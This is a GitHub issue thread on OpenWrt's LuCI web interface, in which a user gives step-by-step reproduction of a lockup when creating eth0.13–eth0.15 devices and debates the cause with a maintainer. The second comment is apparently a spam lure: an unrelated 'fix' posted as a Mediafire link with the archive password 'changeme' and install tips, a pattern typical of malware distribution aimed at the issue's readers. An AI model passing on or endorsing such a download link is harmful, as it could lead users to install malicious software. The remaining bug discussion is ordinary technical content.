openwrt/luci #7265: LUCI: locks up (with some very specific invalid input)

The-QA-Geek, 2024-09-02:
## Steps to reproduce:
We are going to create three devices; we will make a mistake (forget to press the 'Enter' key) in creating the second one and cause it to not be created - so we will create it again, but not make the mistake. It appears that this step is really necessary - obviously it took me quite a long time to narrow down the steps that cause the lockup, so I haven't done it enough times to be absolutely certain that the mistake is necessary; it is possible that this is an intermittent failure - caused by something that I am doing, but perhaps not that one specific thing. However, it does appear that creating all three devices is necessary to reproduce the bug - I tried several times creating only one or two, and wasn't able to reproduce the bug that way.

1. Start with a completely clean install. I held down the reset button for twenty seconds after powering on the router.
2. set a password (probably not necessary, but I am retracing my steps exactly).
3. Go to Network -> Interfaces -> Devices
4. Click 'Add device configuration'
5. Click 'Existing device' and type 'eth0.13' in the 'custom' field
6. Hit the ENTER key (this is important)
7. Click 'Save'
8. Click 'Add device configuration'
9. Click 'Existing device' and type 'eth0.14' in the 'custom' field
10. DO NOT hit the ENTER key (I am pretty sure this is important)
11. Click 'Save'
12. eth0.14 doesn't appear in the list, so click 'Add device configuration' again
13. Click 'Existing device' and type 'eth0.14' in the 'custom' field
14. Hit the ENTER key (this is important)
15. Click 'Save'

16. Click 'Add device configuration'
17. Click 'Existing device' and type 'eth0.15' in the 'custom' field
18. Hit the ENTER key (this is important)
19. Click 'Save'
20. Click 'Save & Apply'

## Actual behavior:

LUCI will show a message saying that they changes are being saved; this will count 90 seconds and then announce that the changes weren't confirmed, so they are being reverted. This message never goes away; the router is locked up. Power cycling it will recover it, at which point it shows a message asking me to revert the changes, confirm the changes, or dismiss the message. Clicking 'Dismiss' returns me to the 'Devices' tab; none of my changes have been saved.

## Expected behavior:

Either an error message, or (better) prevent the user from entering something that locks up LUCI.

## Additional Information:
OpenWrt version information from system `/etc/openwrt_release`

```
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='23.05.4'
DISTRIB_REVISION='r24012-d8dd03c46f'
DISTRIB_TARGET='mvebu/cortexa9'
DISTRIB_ARCH='arm_cortex-a9_vfpv3-d16'
DISTRIB_DESCRIPTION='OpenWrt 23.05.4 r24012-d8dd03c46f'
DISTRIB_TAINTS=''
```

goncastrum, 2024-09-02:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

jow-, 2024-09-02:
Seems you're overriding some device settings which causes OpenWrt to loose network access to your PC. This is nothing we can fix on the LuCI side.

The-QA-Geek, 2024-09-02:
1) If the lockup is caused by step #10, then it can definitely be fixed on the LuCI side.
2) If the lockup is caused by attempting to create a VLAN (eth0.nn) with the Device Type set to 'Network device' rather than 'Virtual Ethernet', then it can definitely be fixed on the LuCI side.
3) Since:
     A) Rebooting fixes the problem
AND
     B) None of the changes I made have been saved, I think that no device settings have been overwritten.

I just went through the steps again but made a slight change; I powered off the router before the 90 second countdown finished. When I powered it back up and got the Dismiss/Revert/Apply dialog I again selected 'Dismiss', but this time the changes are saved! I have eth0.13, eth0.14, and eth0.15 all showing in the 'Devices' tab - I think this definitely shows that the lockup isn't caused by incorrectly overwriting device settings.

I also noticed something else that I think is significant:
 - When I created eth0.13, 'eth0' was visible in the 'Existing device' drop-down list.
 - When I attempted (and failed) to create eth0.14, 'eth0' was visible in the 'Existing device' drop-down list.
 - On my second (and successful) attempt to create eth0.14, 'eth0' was NOT visible in the 'Existing device' drop-down.
 - When I created eth0.15, 'eth0' was NOT visible in the 'Existing device' drop-down list.

I'm not quite sure what that means, but it does suggest that the problem is caused by step #10. Certainly step #10 is causing *A* problem, and Occam's Razor tells us that we should start by assuming that all of these symptoms are being caused by one bug, not by two.